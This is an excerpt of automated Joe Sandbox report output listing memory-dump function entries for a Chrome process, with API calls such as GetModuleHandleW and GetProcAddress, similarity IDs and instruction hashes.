                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: FileSize
                                                                    • String ID: ..\..\base\files\file_win.cc$GetLength
                                                                    • API String ID: 3433856609-1822068241
                                                                    • Opcode ID: 624efbe01214a32180649282162d66ff361b44f293463bba49bc1be12418f411
                                                                    • Instruction ID: 76adb939ecc358e9a9b4e59b8ce1c3aae159f109e8356643bd1cd024816f06ee
                                                                    • Opcode Fuzzy Hash: 624efbe01214a32180649282162d66ff361b44f293463bba49bc1be12418f411
                                                                    • Instruction Fuzzy Hash: B411C43170C996C1FA20AB29A815BE9E3E0BF84BC8F804032DE8D17B25DE3DD1478700
                                                                    APIs
                                                                      • Part of subcall function 00007FF74CC38EF0: UnmapViewOfFile.KERNEL32(00000001,00000000,?,00007FF74CC39083,?,?,chrome.dll,?,?,00000010,?,00007FF74CC38DC9), ref: 00007FF74CC38F08
                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,00007FF74CC38DD9), ref: 00007FF74CC38E9E
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,00007FF74CC38DD9), ref: 00007FF74CC38EAE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFileHandleModuleProcUnmapView
                                                                    • String ID: GetHandleVerifier
                                                                    • API String ID: 3224599007-1090674830
                                                                    • Opcode ID: a82135521f584adbcf8fd56bdd7287ccb4db6d8cea89a037a9201d2aa5e9d875
                                                                    • Instruction ID: 01fda14440671e1f0e92dfd69f803dc0786830329b958cdb2ecd06116a76614b
                                                                    • Opcode Fuzzy Hash: a82135521f584adbcf8fd56bdd7287ccb4db6d8cea89a037a9201d2aa5e9d875
                                                                    • Instruction Fuzzy Hash: 3611E528A0D617C2FA65FB65B855379A261BF45B81F814837DA0E1A3E0DF2CE4499320
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(?,?,00000000,?,00007FF74CC37A66), ref: 00007FF74CC6370F
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,00007FF74CC37A66), ref: 00007FF74CC6371F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetHandleVerifier
                                                                    • API String ID: 1646373207-1090674830
                                                                    • Opcode ID: bc66a7a5de790b16cd6bb6d5faff6acb55d4a3f8080e1c6c61926eb5e9ca4473
                                                                    • Instruction ID: 161a663944ead9ef02c615759a2020e7110a92af4d1af278438e798a71e9760d
                                                                    • Opcode Fuzzy Hash: bc66a7a5de790b16cd6bb6d5faff6acb55d4a3f8080e1c6c61926eb5e9ca4473
                                                                    • Instruction Fuzzy Hash: 76015764F0DA17C1FA15FB25A655338E2A1BF41B80F998437C90E023A0DF2CE4868360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetHandleVerifier
                                                                    • API String ID: 1646373207-1090674830
                                                                    • Opcode ID: b93e278144cd8ff47aad3c733c4689fcee0b6e52e9e7f33d7921598d244cd678
                                                                    • Instruction ID: 4ff284afca7f56e05dabbb97e10aca5f6ac3262f1e6f4e0c60a7d76943b3a513
                                                                    • Opcode Fuzzy Hash: b93e278144cd8ff47aad3c733c4689fcee0b6e52e9e7f33d7921598d244cd678
                                                                    • Instruction Fuzzy Hash: E7018124F4E623C1FF58F7A1A496279A361BF44B84F824437CA0E563A0DF3CA545C724